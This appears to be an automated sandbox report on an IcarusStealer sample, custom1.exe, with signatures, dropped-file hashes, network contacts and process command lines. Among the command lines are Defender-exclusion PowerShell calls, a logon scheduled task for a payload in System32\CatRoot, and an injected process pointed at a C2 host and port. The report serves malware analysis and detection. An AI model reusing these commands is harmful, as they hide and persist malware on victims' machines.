Analysis Overview
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Threat Level: Known bad
The file custom1.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Modifies system certificate store
Suspicious use of SetWindowsHookEx
Modifies registry class
Creates scheduled task(s)
Uses Volume Shadow Copy WMI provider
Checks SCSI registry key(s)
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 05:44
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 05:44
Reported
2024-03-09 05:47
Platform
win7-20240221-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\custom1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2692 set thread context of 2092 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\YourPhone.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\custom1.exe
"C:\Users\Admin\AppData\Local\Temp\custom1.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrtvptk5\wrtvptk5.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1BCA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2E7432A2F41F46AB9FD13539767D44EA.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2B93.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 172.67.72.57:443 | keyauth.win | tcp |
| N/A | 127.0.0.1:49220 | tcp | |
| N/A | 127.0.0.1:49222 | tcp | |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49286 | tcp | |
| N/A | 127.0.0.1:49288 | tcp |
Files
\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | c4e258d20a97211d53b46822d9796075 |
| SHA1 | 885d8dba7ef3e485ffbcccaa30004a75c281dced |
| SHA256 | aae1abb245f0e59f27e80a496282673b92b1e06b8be4850699bbf8107515931a |
| SHA512 | 830e9b80f3d46d7a62d14c66bf871d090c4228b5974bb7d4bae97c5cc49fa63716e9a6f69eba4dd36ffb275e9d87337c77481365e1587872e60c9a97fb431ced |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 30374717eeb3c4b48c389586ec59d0c4 |
| SHA1 | b0ae8e1330bb63408474f34fe12e5b59a3a4655e |
| SHA256 | f5fec64480dd48af03c177d78d70e06f66d72eea212a23e09f0125ac9632372a |
| SHA512 | 38274ab6700c51ff2f5c91ad3da45ee066231ea84bfb81cdfb7f84f18625dca7ad7005f6e44c8235603e2f0f607b88dff0d42d501325b2b330b06343878c340b |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | f92e69f40fd9a675301c9c699b49ab7d |
| SHA1 | 2915bbadb83f4e5f962420e8dc01d8df80af73a7 |
| SHA256 | 3f10e6d4e443099cc84a1ce82c963394d9999ecc51687448ea6923d6183e12fa |
| SHA512 | 31ba38ed4c47f011c9c20f5356eb51e0cdd4a0ba89f733e2ee71efff4552948a3dc4756c198a607c7141d6c37cd0c547dcae455f454590c06e9f8896021fdac5 |
\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | b9bbe31d276de5c3d05352d070ae4244 |
| SHA1 | 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec |
| SHA256 | a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d |
| SHA512 | 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17 |
memory/1716-14-0x00000000000D0000-0x0000000000710000-memory.dmp
\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | ec472524eaf5e61e5934c73d5df36b46 |
| SHA1 | 25bb9d2126b9a58fa3732a08043f5307d87927df |
| SHA256 | b7dfc6823243f225760d65afdedc25cbdc7e4ee383c93d712a5c5dd52e6f6acd |
| SHA512 | 2b266c8594c6827b82fae69b04827975629954f0fd984bb6b437222f009520a35c28624d639d85bb7e7215230cd485ee9cf1c52df8057fb8dbad38b1c39725c0 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 7b806012575d8b2abcfefb9fcb3c852d |
| SHA1 | 56560ef6aa60d68ea8eccb505215533de84bff46 |
| SHA256 | c97bfebb5732f376cf6e2bf7e6f4eedb8f66be0e193b7d30fe9859f890d649fe |
| SHA512 | aa3c85e3d4a6f0805289a1885b0674f694aa098d0c013c18a6aa4ad0661cc79a72d895cc15ba85678225c25070cbac1270048c30d49ba55a6a2e39ee911c52cd |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
memory/1716-28-0x0000000074350000-0x0000000074A3E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | f141506d2acbeeed5ca25c5134964ca3 |
| SHA1 | 41eacf15501ce5488e87936b35bac488380cc8ed |
| SHA256 | ea9e6aa4cfca6f9ed55fc5b0803a223ecba54a99cdd1a3e6a3b9da57745bcd1d |
| SHA512 | 878af9adacd0be680a4346c7ee347e7394eab46e661132489e678c01a58c97657b1655bf77cb393e037c36c2cec0177d397f63facea83d5bebaf6f8deddade8d |
memory/2564-29-0x000000013F2A0000-0x000000013F6DC000-memory.dmp
memory/2692-30-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/2692-26-0x00000000011E0000-0x0000000001262000-memory.dmp
memory/2692-31-0x0000000004F90000-0x0000000004FD0000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\wrtvptk5\wrtvptk5.cmdline
| MD5 | 2252349e29fa038a0e6bc05ad31f35b9 |
| SHA1 | 1e2c924eacfc47f16520a629d5665bc9b6fcd66d |
| SHA256 | 7f650e390c9a3292f81d424361f3381eec0869c25602195406dc82ec20f60cb9 |
| SHA512 | 50f4706ec687ad68d6842fc355d0776ae25c5f2b2fa2bfd78bad4f2454600911c1ceceef41e816d354e8605ebf3cdc9e92c7925c1934973443b6dcf3db72599b |
\??\c:\Users\Admin\AppData\Local\Temp\wrtvptk5\wrtvptk5.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC2E7432A2F41F46AB9FD13539767D44EA.TMP
| MD5 | 1d5543c367c49b9dd6366270fdd4ee3a |
| SHA1 | bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66 |
| SHA256 | 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2 |
| SHA512 | 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04 |
memory/2092-45-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2092-44-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2092-46-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES1BCA.tmp
| MD5 | 76007e7f19735c7dfff9c59738cfdaf5 |
| SHA1 | 88e1ce155b7220139e4e892acb3bbcef41d09bca |
| SHA256 | 01b77e4aff034038c88716d9ddc5735c9f9747552bb5679c6850f01d44f52a72 |
| SHA512 | ee201d840ebd8e914289bd9e5038ee1ed133278792fd8d7e14bb9bbb716279fe76bc696b190b83ed2551729cf9f4f7302d7bd31776472b0e7b69180b7a4901f5 |
memory/2092-47-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
| MD5 | b9fbcd8ae1a16ba8b740b793855194b0 |
| SHA1 | 6a20f4d7129c0bc2bc6587d6ea9fbfdd91279791 |
| SHA256 | 93c28ed98f36d155cca6f2f1e1c09d9a3f8cc9b7431ffb0aca214cd32c3da9b3 |
| SHA512 | 0eb0e9898cdb8eb12e8d3426284154feb130f7640121c59c72ae04b70fccc95b78acc5440a206e772b97de8838bbe01025c17e701feb569a99386c6043d8e6d3 |
memory/2092-50-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2092-57-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2092-55-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2092-53-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2976-58-0x0000000000E30000-0x0000000000E38000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1VN6Y1G9HUY7AACBNFOT.temp
| MD5 | 35712472ce2d92df91b40582cc324a5c |
| SHA1 | 318373b202435b23d708180f3b31d438b5d6b9b0 |
| SHA256 | edea7b149c46c7d8372c1948d8f2736250a115b8049c43579cc8391569a91de8 |
| SHA512 | be29540c26173b15442ebe3708e0171466177d719eca28ce4bb7d5a0b627c99299ecab6df651f3fa927a714c9824c7f572905b6fa9017fc4b36fb88eef431d61 |
memory/2976-66-0x000007FEF5660000-0x000007FEF604C000-memory.dmp
memory/2092-67-0x0000000004920000-0x0000000004960000-memory.dmp
memory/1204-68-0x000000006EF50000-0x000000006F4FB000-memory.dmp
memory/2692-69-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/1560-70-0x000000006EF50000-0x000000006F4FB000-memory.dmp
memory/1204-71-0x00000000028F0000-0x0000000002930000-memory.dmp
memory/1204-72-0x000000006EF50000-0x000000006F4FB000-memory.dmp
memory/1560-73-0x0000000002000000-0x0000000002040000-memory.dmp
memory/1560-74-0x000000006EF50000-0x000000006F4FB000-memory.dmp
memory/1204-75-0x00000000028F0000-0x0000000002930000-memory.dmp
memory/1560-76-0x0000000002000000-0x0000000002040000-memory.dmp
memory/1560-77-0x0000000002000000-0x0000000002040000-memory.dmp
memory/2092-78-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/1204-79-0x00000000028F0000-0x0000000002930000-memory.dmp
memory/2976-82-0x00000000003E0000-0x0000000000460000-memory.dmp
memory/1560-83-0x000000006EF50000-0x000000006F4FB000-memory.dmp
memory/1204-84-0x000000006EF50000-0x000000006F4FB000-memory.dmp
memory/1716-85-0x00000000024D0000-0x0000000002510000-memory.dmp
memory/2564-86-0x000000013F2A0000-0x000000013F6DC000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | 1e1f2e230f4e1c7d9f9a048bbf9d7ec4 |
| SHA1 | aacda166a772faff6f45a9bf5e4dbe3813efa935 |
| SHA256 | b05118c18a35892d043697caccdef11d4ba74907986f093b78c7a66a998f2d7b |
| SHA512 | 840e0cabcb48852c1040e2c8a384cf3a997196ba8d41ad02db8f22b72e944a60c877f614742da6c233ca5413e46540f5b1ff0bc35c8fe6f75e7939392c349599 |
C:\Users\Admin\AppData\Local\Temp\tmp2B93.tmp.bat
| MD5 | 3512325c16882d490993552a880f48ab |
| SHA1 | be8dae14724212ed80f257929fe30e457aa369e3 |
| SHA256 | 495560b364c116ff959c367ae72e14fe0135f417b82f02b774126e00e4e530f7 |
| SHA512 | 4d84ce8b1cd5bf6b18327f9a41d9ac22812db7e7535b4e213eae34ec60d1e643158e99f9c1c23025a4756630239f150649a824bca59822cc60ad84cc9a26660a |
memory/1716-98-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/556-99-0x0000000004090000-0x0000000004091000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | 3b03ddc209f97547dd4dd8919f7a5894 |
| SHA1 | 38f63fb9131c10b2c7ed91dc415df81099a083c3 |
| SHA256 | 632ef3ce8f91fc7dfc7edc28325ab0d58e4627e7c91fd5f68a7a014abe8a7ce4 |
| SHA512 | ee6ec5d778e972e82a09d74537aede69da55490be1e5a0c45048b53eba0b1f436552125c7b6dcccde05c01457598c943d2cee3f875c52f4a933412425c177727 |
\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | d377b6bbca14055e4819a53f5f8e4be3 |
| SHA1 | 34fa3bc796af0e8f440649429f5586579f9f2c53 |
| SHA256 | 2371269092c8700be584345f8c5b2bedba36ed303f72d6e66db10c1df2a2d185 |
| SHA512 | c9ed252ed0b0d4485c7b8236d210f7dcbeb8f17aeba60538944973e2870b3612016034bc2d14beb0e5d0ba43ed27f2f71b1f997c6d77a27efa492104a5225120 |
memory/928-104-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/928-103-0x0000000000970000-0x0000000000FB0000-memory.dmp
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | 3e4013fd2b35368f8964777924f91815 |
| SHA1 | ac265bab275e551f588eae4306107a3db9d28d6e |
| SHA256 | d3fdac096bde20584e2ef92f65d528043dca634f30a218b3e8fe5efff029da19 |
| SHA512 | 6d0f31ab254645737faf2605989818b75c6f2bdc19eab5420ff539c603a93e5b654c3f93605b9aca3977c6addc61423daa0a3ed09922134023926ad9b66543e8 |
memory/928-105-0x00000000025D0000-0x0000000002610000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\Read.txt
| MD5 | 79668a6729f0f219835c62c9e43b7927 |
| SHA1 | 0cbbc7cc8dbd27923b18285960640f3dad96d146 |
| SHA256 | 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e |
| SHA512 | bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3 |
C:\Users\Admin\AppData\Local\Temp\Cab5073.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
memory/2976-124-0x000007FEF5660000-0x000007FEF604C000-memory.dmp
memory/2092-125-0x0000000004920000-0x0000000004960000-memory.dmp
memory/2092-126-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/2976-127-0x00000000003E0000-0x0000000000460000-memory.dmp
memory/556-128-0x0000000004090000-0x0000000004091000-memory.dmp
memory/928-129-0x0000000074350000-0x0000000074A3E000-memory.dmp
memory/928-130-0x00000000025D0000-0x0000000002610000-memory.dmp
memory/556-135-0x0000000002B20000-0x0000000002B30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 05:44
Reported
2024-03-09 05:47
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
IcarusStealer
